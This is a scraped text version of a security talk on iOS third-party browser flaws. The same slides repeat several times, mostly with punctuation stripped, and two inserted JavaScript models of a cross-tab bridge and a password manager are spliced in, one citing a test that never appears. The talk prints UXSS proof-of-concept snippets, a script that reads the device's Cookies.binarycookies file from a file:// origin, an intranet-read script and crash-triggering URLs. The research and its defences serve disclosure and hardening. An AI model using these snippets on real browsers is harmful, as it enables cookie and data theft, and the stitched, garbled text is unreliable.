bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 34: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/34.jpg)
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS, the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.
Universal Cross-Site Scripting
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
-> mbexec$(WINDOW_ID)[ command: window.open, target: 1234, "url": about:blank ]   (the target id comes from Math.random())
-> [webView loadRequest: … "about:blank" …]
cross-frame forgery
w.document.write('Hi')
-> mbexec$(WINDOW_ID)[ "command: window.document.write, target: 1234, "html": Hi ]
-> [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') …and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi') -> [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right? -> [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') -> applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi') -> [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
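As an added example that is not the code of Mercury, Yandex.Browser or Chrome for iOS, the JavaScript below models the native side of a cross-tab bridge handling the "window.open" and "window.document.write" commands shown above. It puts the check-once pattern (origin compared at window.open time only, and about:blank loaded with a nil base) beside the safe pattern from this slide: the caller's origin is compared with the target tab's current origin on every command, and written HTML is loaded with an explicit about:blank base. The tab registry, originOf(), tabOrigin() and both decision functions are this model's own, each decision returns what would be passed to loadHTMLString:baseURL: instead of calling UIKit, and the scenario URLs are constructed.

```javascript
// Added example: model of a cross-tab bridge's native side. Everything here
// is this model's own; it is not any browser's bridge implementation.

// Browser-style origin: scheme + host + port. about:blank and anything that
// is not an http(s) URL get an opaque origin (null), which equals nothing.
function originOf(url) {
  if (url === "about:blank") return null;
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  return (u.protocol === "http:" || u.protocol === "https:") ? u.origin : null;
}

function createBridge() {
  return { tabs: new Map(), nextId: 1 };
}

// window.open issued by a page at openerURL. An about:blank child remembers
// its opener, because the opener may script it until it navigates elsewhere.
function bridgeWindowOpen(bridge, openerURL, url) {
  const id = bridge.nextId++;
  bridge.tabs.set(id, {
    url,                                               // what the tab's web view has loaded now
    openedWith: url,                                   // what it was asked to load at open time
    openerURL: url === "about:blank" ? openerURL : null,
  });
  return id;
}

// Any later navigation of the tab (server redirect, user action) replaces its
// current URL; the about:blank inheritance ends at that point.
function bridgeNavigate(bridge, id, url) {
  const tab = bridge.tabs.get(id);
  tab.url = url;
  tab.openerURL = null;
}

// Effective origin of a tab: an un-navigated about:blank child belongs to its
// opener's origin; otherwise it is the origin of what is loaded right now.
function tabOrigin(tab) {
  return originOf(tab.openerURL !== null ? tab.openerURL : tab.url);
}

// Check-once variant (the CVE-2013-7197 pattern): the origin is compared
// against what the tab was opened with, never against where it is now, and
// about:blank targets get baseURL nil (the CVE-2012-2899 pattern).
function checkOnceDocumentWrite(bridge, callerURL, id, html) {
  const tab = bridge.tabs.get(id);
  if (!tab) return { allowed: false, reason: "unknown window id" };
  const caller = originOf(callerURL);
  const atOpen = tab.openedWith === "about:blank" ? caller : originOf(tab.openedWith);
  if (caller === null || atOpen !== caller) {
    return { allowed: false, reason: "cross-origin at window.open time" };
  }
  return { allowed: true, html, baseURL: tab.url === "about:blank" ? null : tab.url };
}

// Re-check variant: compare caller and the tab's *current* effective origin on
// every command, and load the written HTML with an explicit about:blank base.
function safeDocumentWrite(bridge, callerURL, id, html) {
  const tab = bridge.tabs.get(id);
  if (!tab) return { allowed: false, reason: "unknown window id" };
  const caller = originOf(callerURL);
  const target = tabOrigin(tab);
  if (caller === null || target === null || caller !== target) {
    return { allowed: false, reason: "cross-origin document.write refused" };
  }
  return { allowed: true, html, baseURL: "about:blank" };
}

// Constructed scenarios; the URLs are placeholders.
const PAGE = "http://site.example/page";

function redirectAfterOpen(writer) {       // same-origin child, then redirected
  const b = createBridge();
  const id = bridgeWindowOpen(b, PAGE, "http://site.example/child");
  bridgeNavigate(b, id, "https://bank.example/");
  return writer(b, PAGE, id, "<p>injected</p>");
}

function aboutBlankChild(writer) {         // the "no URL" child
  const b = createBridge();
  const id = bridgeWindowOpen(b, PAGE, "about:blank");
  return writer(b, PAGE, id, "<p>Hi</p>");
}

function crossOriginOpen(writer) {         // cross-origin child from the start
  const b = createBridge();
  const id = bridgeWindowOpen(b, PAGE, "https://bank.example/");
  return writer(b, PAGE, id, "<p>injected</p>");
}

console.log(redirectAfterOpen(checkOnceDocumentWrite)); // allowed, baseURL https://bank.example/
console.log(redirectAfterOpen(safeDocumentWrite));      // refused
console.log(aboutBlankChild(checkOnceDocumentWrite));   // allowed, baseURL null
console.log(aboutBlankChild(safeDocumentWrite));        // allowed, baseURL about:blank
```

The two decisions differ exactly where the three CVEs did: the check-once bridge lets the redirected child be written into under bank.example's origin and hands an about:blank child a nil base, while the re-checking bridge refuses the first and gives the second an opaque about:blank origin that cannot reach any web origin or local file.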
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] -> nil for a malformed URL string
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) -> NULL likewise
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other with a filename ending in .html -> HTML
JS without Same-Origin Policy
<script>a = document.location.href.split('/'); if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7]; path = path + '/Library/Cookies/Cookies.binarycookies'; x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText)</script>
<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText)</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
• Native (WebKit) vs. Application (bolted-on)
• Bridge (internal) vs. Registered (external)
• scheme://download?https://secure.tld/victim/data -> scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 1/4 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript runs with the privileges of the top frame -> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs. http)
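As an added example, not code from any of the browsers tested in the deck, the JavaScript below models a WebView-based browser's password-manager decisions. It puts the host-only fill check the deck describes (domain compared, scheme ignored, frames ignored) beside an origin-based policy that fills only in the top frame and only when the full origin, scheme included, matches, and it keys saved credentials by the origin of the submitting top-level document so that a page on another domain cannot plant a credential for the victim site. The credential store, the context object (documentURL, isTopFrame) and both policy functions are this model's own, and all URLs and credentials are constructed.

```javascript
// Added example: a model of password-manager fill and save decisions in a
// WebView-based browser. The store, context shape and policies are this
// model's own assumptions, not any browser's implementation.

// Constructed store: one credential, keyed by the full origin (scheme, host,
// port) of the login page it was saved on.
const constructedStore = [
  { origin: "https://bank.example", username: "alice", password: "hunter2" },
];

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Host-only matching: fills on any document whose hostname matches, whatever
// the scheme and whether or not the form sits in a subframe. This is the weak
// policy the deck describes.
function hostOnlyFill(store, ctx) {
  const host = new URL(ctx.documentURL).hostname;
  return store.find(c => new URL(c.origin).hostname === host) || null;
}

// Origin matching: the form's document must be the top frame (the bridge's
// JavaScript only speaks for the top frame) and its full origin must equal
// the origin the credential was saved for, so an http:// downgrade of an
// https:// login page gets nothing.
function originFill(store, ctx) {
  if (!ctx.isTopFrame) return null;
  const origin = originOf(ctx.documentURL);
  if (origin === null) return null;
  return store.find(c => c.origin === origin) || null;
}

// Saving: key the credential by the origin of the submitting top-level
// document, never by a hostname, form action or URL supplied by page content.
function saveCredential(store, ctx, username, password) {
  if (!ctx.isTopFrame) return false;
  const origin = originOf(ctx.documentURL);
  if (origin === null) return false;
  store.push({ origin, username, password });
  return true;
}

// Constructed contexts.
const httpsTop   = { documentURL: "https://bank.example/login", isTopFrame: true };
const httpTop    = { documentURL: "http://bank.example/login",  isTopFrame: true };  // scheme downgrade
const httpsFrame = { documentURL: "https://bank.example/login", isTopFrame: false }; // login form in a subframe

console.log(hostOnlyFill(constructedStore, httpTop));  // fills alice's credential on plain http
console.log(originFill(constructedStore, httpTop));    // null
console.log(originFill(constructedStore, httpsFrame)); // null
console.log(originFill(constructedStore, httpsTop));   // alice's credential
```

A forced-save attempt from a page at another origin ends up keyed under that page's own origin, so it is neither returned on bank.example nor able to overwrite the entry saved there; the test below exercises that path as well.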
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Mobile Browsers Security: iOS
![Page 35: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/35.jpg)
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 36: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/36.jpg)
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
